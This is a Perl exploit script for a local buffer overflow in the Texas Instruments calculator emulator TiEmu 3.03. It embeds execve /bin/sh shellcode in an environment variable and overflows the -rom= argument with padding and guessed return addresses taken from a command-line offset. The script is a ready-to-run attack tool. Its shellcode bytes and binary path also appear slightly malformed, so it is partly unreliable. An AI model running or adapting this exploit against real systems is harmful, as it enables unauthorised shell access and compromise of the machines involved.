#!/usr/bin/perl ################################################################# #This exploit uses command line arguments for different offsets # #So it can be tested on different systems *NIX Flavours # ################################################################# ########################################################################## #Texas Instruments Emulator exploit # #Version: 3.03-nogdb+dfsg-3 # # # #As discussed here previously: https://www.exploit-db.com/exploits/39692/# #And here https://packetstormsecurity.com/files/136679/Texas-Instruments # #-Calculators-Emulator-3.03-nogdb-dfsg-3-Buffer-Overflow.html # # # # EMAIL -> n_a at tutanota.com # # # ########################################################################## $filename = "usr/bin/tiemu"; #path name of the binary $shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\xb0\x0b\xcd\x80"; #Calculating the return address of our shellcode $ret = 0xbffffffa - length($shellcode) - length($filename); #Try different offsets $offs = $ARGV[0]; print "\n***Local Exploit for Texas Instruments Emulator***\n"; print "\t\tBy N_A\n\n"; print "Use: $0 Offset\n\n"; sleep 1; printf("Ret Shellcode 0x%x\n",$ret + $offs); $adr = pack('l', ($ret + $offs)); $buff = 'A' x 96; $buff .= $adr x 6; #Set buffer in local var local($ENV{'NNN'}) = $shellcode; exec("$filename -rom= $buff"); #eof